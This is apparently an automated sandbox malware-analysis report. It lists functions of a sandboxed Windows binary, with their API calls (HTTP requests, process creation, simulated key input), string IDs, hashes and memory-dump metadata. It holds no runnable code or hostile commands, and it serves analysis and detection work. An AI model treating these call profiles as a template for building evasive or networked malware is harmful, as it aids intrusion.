                                                  • Opcode ID: 7aacb846f20265327b617c9c5ed9e4a833a71f674eade13dacc65e0cc1cfcbee
                                                  • Instruction ID: 8d2219d752a455e17acb1409938f4855da8190c1b715f15303268ae0c69e7ca5
                                                  • Opcode Fuzzy Hash: 7aacb846f20265327b617c9c5ed9e4a833a71f674eade13dacc65e0cc1cfcbee
                                                  • Instruction Fuzzy Hash: F421E735500205EFDB216FA4EC48FED7BB1FB0A321F1142A9FA25990A1CB714952EF11
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BCFAA6
                                                  • OleUninitialize.OLE32(?,00000000), ref: 00BCFB45
                                                  • UnregisterHotKey.USER32(?), ref: 00BCFC9C
                                                  • DestroyWindow.USER32(?), ref: 00C045D6
                                                  • FreeLibrary.KERNEL32(?), ref: 00C0463B
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C04668
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 8c9c2416e828c348b0b26e5e759929bda5bebe392a1ff3b40375bd8a68246c9d
                                                  • Instruction ID: 18c746ba067d863010a3a318cabda6ffe10f9e2f3bb510f58b4c39abeab63f71
                                                  • Opcode Fuzzy Hash: 8c9c2416e828c348b0b26e5e759929bda5bebe392a1ff3b40375bd8a68246c9d
                                                  • Instruction Fuzzy Hash: D7A147747012128FCB29EF14C994F6AF3A5EF05700F5542EDE90AAB2A1DB31AD56CF90
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00C1A439), ref: 00C1A377
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: ae222c9831e40b804cea793bd512881698228f266c939954a9e2365ddea047ce
                                                  • Instruction ID: b67ed4bfae75aab8838367210ad78871b31e9a6fa3f9fffa7823cc51642d739e
                                                  • Opcode Fuzzy Hash: ae222c9831e40b804cea793bd512881698228f266c939954a9e2365ddea047ce
                                                  • Instruction Fuzzy Hash: 6C91C631601609ABCB08EFA1C442BEDFBF4BF16300F548169D46DA7251DF31AAD9EB91
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00BC2EAE
                                                    • Part of subcall function 00BC1DB3: GetClientRect.USER32(?,?), ref: 00BC1DDC
                                                    • Part of subcall function 00BC1DB3: GetWindowRect.USER32(?,?), ref: 00BC1E1D
                                                    • Part of subcall function 00BC1DB3: ScreenToClient.USER32(?,?), ref: 00BC1E45
                                                  • GetDC.USER32 ref: 00BFCD32
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BFCD45
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00BFCD53
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00BFCD68
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFCD70
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BFCDFB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: f2c525a07bf1139a34a4da3d106f18c5fb58b3a0b79264993fdb48f1d5c31a02
                                                  • Instruction ID: 2a8cf8fd8167f866b1dd339aef92ae5b69264a8046889b198c152a63fdf1dea7
                                                  • Opcode Fuzzy Hash: f2c525a07bf1139a34a4da3d106f18c5fb58b3a0b79264993fdb48f1d5c31a02
                                                  • Instruction Fuzzy Hash: 3D716A3590020DDFCF259F64C984ABA7FF5FB49320F1442BAEE556B2A6C7309885DB60
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C31A50
                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C31A7C
                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C31ABE
                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C31AD3
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C31AE0
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C31B10
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C31B57
                                                    • Part of subcall function 00C32483: GetLastError.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C32498
                                                    • Part of subcall function 00C32483: SetEvent.KERNEL32(?,?,00C31817,00000000,00000000,00000001), ref: 00C324AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                  • String ID:
                                                  • API String ID: 2603140658-3916222277
                                                  • Opcode ID: 9ba391e37229c3ffd7b5327f31fd16bdea0c85e792695bd004fa480419b41aaf
                                                  • Instruction ID: 8b13cdaa02ecc2045aeaa6b9019d1e47182de45d8788b56cbcf8a035aa7d26a2
                                                  • Opcode Fuzzy Hash: 9ba391e37229c3ffd7b5327f31fd16bdea0c85e792695bd004fa480419b41aaf
                                                  • Instruction Fuzzy Hash: C2418AB1511208BFEB118F51CC89FBEBBACFB09354F04412AFE159A141EB749E419BA0
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C4F910), ref: 00C38D28
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C4F910), ref: 00C38D5C
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C38ED6
                                                  • SysFreeString.OLEAUT32(?), ref: 00C38F00
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 3f056ed84ce9d2c35297449f5bba66925cac181a2543cc552bb6eb05c84224bc
                                                  • Instruction ID: 27388b837d6209c0f7ad40834e67128673813d658407c82f3fda71a2a72ad99c
                                                  • Opcode Fuzzy Hash: 3f056ed84ce9d2c35297449f5bba66925cac181a2543cc552bb6eb05c84224bc
                                                  • Instruction Fuzzy Hash: 34F13775A10209EFDF04DF94C888EAEB7B9FF49314F108498F915AB251DB71AE46CB90
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C3F6B5
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F848
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F86C
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F8AC
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C3F8CE
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C3FA4A
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C3FA7C
                                                  • CloseHandle.KERNEL32(?), ref: 00C3FAAB
                                                  • CloseHandle.KERNEL32(?), ref: 00C3FB22
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 6c05167739da34bbc90efbf41f1d509cd4a23293c3202aa122072b7d73f31ac2
                                                  • Instruction ID: 7c858d4249d4e95fd6d46dcbf3c1d08e2686dce6ade3c86753213afa2f654aac
                                                  • Opcode Fuzzy Hash: 6c05167739da34bbc90efbf41f1d509cd4a23293c3202aa122072b7d73f31ac2
                                                  • Instruction Fuzzy Hash: 26E1C131614341AFDB14EF24C881B6ABBE1FF85354F14896DF8998B2A1CB30DD46DB52
                                                  APIs
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C23697,?), ref: 00C2468B
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C23697,?), ref: 00C246A4
                                                    • Part of subcall function 00C24A31: GetFileAttributesW.KERNEL32(?,00C2370B), ref: 00C24A32
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C24D40
                                                  • _wcscmp.LIBCMT ref: 00C24D5A
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C24D75
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: d37df9d0d358033e9509d04272358430960aa86f73380e8f4cc922142e3a7d72
                                                  • Instruction ID: 89f5d8b4246cf540c74afa1748a1666831b3e5a0ace23997fafac89eddc38297
                                                  • Opcode Fuzzy Hash: d37df9d0d358033e9509d04272358430960aa86f73380e8f4cc922142e3a7d72
                                                  • Instruction Fuzzy Hash: 485153B20083959BC724DBA4DC81ADF73ECAF84350F00492EF285D3551EF75A689CB66
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C486FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: f949b4a7a4888740bf1457bcceca2beb69a3b0a6a5cf00ff326b8fc03d3de11c
                                                  • Instruction ID: 783e41c749da72156b8cd52fc55f9c35c97a358b6d5df1ae7a5e78345bc0a09e
                                                  • Opcode Fuzzy Hash: f949b4a7a4888740bf1457bcceca2beb69a3b0a6a5cf00ff326b8fc03d3de11c
                                                  • Instruction Fuzzy Hash: AB51A034600244FFEF209B29CC89FAD7BA5FB05760F604115FA65E61E1CF72AA88DB51
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BFC2F7
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BFC319
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BFC331
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BFC34F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BFC370
                                                  • DestroyIcon.USER32(00000000), ref: 00BFC37F
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BFC39C
                                                  • DestroyIcon.USER32(?), ref: 00BFC3AB
                                                    • Part of subcall function 00C4A4AF: DeleteObject.GDI32(00000000), ref: 00C4A4E8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: 412046136de13c3a6863f1ed0f8edb82e061634af19f488a6ec2dae49eec6551
                                                  • Instruction ID: 431e04ea2a245591ba4fbc20807022c907015e76cd71f565356a88a63c5835fd
                                                  • Opcode Fuzzy Hash: 412046136de13c3a6863f1ed0f8edb82e061634af19f488a6ec2dae49eec6551
                                                  • Instruction Fuzzy Hash: 28515774A40209AFDB24DF24CC85FAE7BE5FB08350F10456CF94297290DBB0AC91DB54
                                                  APIs
                                                    • Part of subcall function 00C1A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1A84C
                                                    • Part of subcall function 00C1A82C: GetCurrentThreadId.KERNEL32 ref: 00C1A853
                                                    • Part of subcall function 00C1A82C: AttachThreadInput.USER32(00000000,?,00C19683,?,00000001), ref: 00C1A85A
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C1968E
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C196AB
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C196AE
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C196B7
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C196D5
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C196D8
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C196E1
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C196F8
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C196FB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 73ee1186299e0ed04f7b4aabd8f4ef947d2848b645f1035977bb8dd1f8529647
                                                  • Instruction ID: c68b85fe9cb2f8892a5a0b8ce11e117ded3cd49c3259e62356e6a4daa5455cb6
                                                  • Opcode Fuzzy Hash: 73ee1186299e0ed04f7b4aabd8f4ef947d2848b645f1035977bb8dd1f8529647
                                                  • Instruction Fuzzy Hash: DD11E1B5910218BEF6106F60DC89FAE3B6DEB4E750F110429F244AB0E0C9F26C51EAA4
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00C1892A
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C18931
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C18946
                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00C1894E
                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00C18951
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00C18961
                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00C18969
                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00C1896C
                                                  • CreateThread.KERNEL32(00000000,00000000,00C18992,00000000,00000000,00000000), ref: 00C18986
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: fb9dc8330f64f590b8c8023ad9df8f77f4fcb9707b782a04a4c046f17d53e395
                                                  • Instruction ID: 663166dba8039243616f271a9bc693adb294f04fcc6520e17ca03feca50570b7
                                                  • Opcode Fuzzy Hash: fb9dc8330f64f590b8c8023ad9df8f77f4fcb9707b782a04a4c046f17d53e395
                                                  • Instruction Fuzzy Hash: 4801A8B9640308FFE610ABA5DC49F6F3BACFB8A711F408425FA05DB1A1CA7098018A20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: 6c7f7d2fbe36cfc0812a27716cdc3acc4b63f4cbd64d08e1f6e2425af7090839
                                                  • Instruction ID: 2c346fe258c1c37b56646e443c352a648c60855205ef2077d1ea4754cfdd2367
                                                  • Opcode Fuzzy Hash: 6c7f7d2fbe36cfc0812a27716cdc3acc4b63f4cbd64d08e1f6e2425af7090839
                                                  • Instruction Fuzzy Hash: 43C1C471A1021A9FDF10DF98D885BEEB7F5FF48314F148469E915AB280E7B0AE45CB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 055a9e1e14276e0cbd668388aa8a4df21289ce9db5c5742106077cb68b6aed86
                                                  • Instruction ID: 6c4e82dff557d1ad403bda41a81bf3b63eb2d4570e58849bc0db0aacf50cc515
                                                  • Opcode Fuzzy Hash: 055a9e1e14276e0cbd668388aa8a4df21289ce9db5c5742106077cb68b6aed86
                                                  • Instruction Fuzzy Hash: 36918E71A10219ABDF24DFA5CC48FAFBBB8EF45710F108159F915AB290D7B09A45CFA0
                                                  APIs
                                                    • Part of subcall function 00C1710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?,?,00C17455), ref: 00C17127
                                                    • Part of subcall function 00C1710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17142
                                                    • Part of subcall function 00C1710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?,?), ref: 00C17150
                                                    • Part of subcall function 00C1710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C17044,80070057,?), ref: 00C17160
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C39806
                                                  • _memset.LIBCMT ref: 00C39813
                                                  • _memset.LIBCMT ref: 00C39956
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C39982
                                                  • CoTaskMemFree.OLE32(?), ref: 00C3998D
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00C399DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: a0876cd1d63f3a40c70e3eec47f83cbb43033ea2a86ca3947ecf3808908316d6
                                                  • Instruction ID: fadc62dbc3a5d51ac3b4ef40dc69df7df4b2125d9fe84791cc6796aa9bab29d0
                                                  • Opcode Fuzzy Hash: a0876cd1d63f3a40c70e3eec47f83cbb43033ea2a86ca3947ecf3808908316d6
                                                  • Instruction Fuzzy Hash: 95912771D00229EBDB10DFA5DC44EDEBBB9EF09310F20416AF519A7291DB71AA44DFA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C46E24
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C46E38
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C46E52
                                                  • _wcscat.LIBCMT ref: 00C46EAD
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C46EC4
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C46EF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
